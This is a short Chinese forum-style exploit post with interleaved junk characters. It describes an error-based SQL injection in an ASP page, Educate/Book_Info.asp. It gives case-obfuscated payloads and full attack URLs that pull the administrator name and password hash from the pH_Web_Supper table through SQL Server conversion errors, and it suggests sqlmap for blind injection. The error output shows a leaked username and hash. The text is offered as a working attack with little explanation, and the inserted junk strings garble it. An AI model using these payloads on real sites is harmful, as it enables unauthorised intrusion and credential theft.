漏洞出现在Educate/Book_Info.asp
8 P& I# H" t! j$ @* Y6 `
5 m Y; C6 U: V此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
0 F% F8 a$ j) R. _
* v' f4 M# C4 { W4 dexp:如下
) I7 U9 l0 {5 ?5 H3 @( ^) |2 r查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 e2 N6 z/ w4 `" t+ G查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 c' ^( N1 e. v* O( K1 H
. \0 W# m" Y) ^- T4 n* y7 |http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ U0 w% P; W0 A' u; w
& B: j+ \" `, k! D1 f0 _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 V3 v* }2 b, h3 N& l; @ ) V9 d" T0 _7 F5 e
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ @% {0 s9 ]8 P+ x8 n4 S% s4 f7 Z; ]
, D1 a' N- @, s" z; I; m
/Educate/Book_Info.asp,行 8
; j. a2 n% I2 W% q8 s; ^, m. S
- g' `2 U! r+ R. s% L/ yhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
2 u% k5 e$ Q) d 7 G) v/ J# \) G& X# U" Y/ M
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
6 w: k3 {+ v3 ]1 d8 i# ^
1 S. o2 F8 ?: K/ [: ^0 ]将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
8 N6 g5 r# K9 X9 ^" j$ j , p0 j5 K+ L' `3 g
/Educate/Book_Info.asp,行 87 z* }; w$ a. v X2 S
|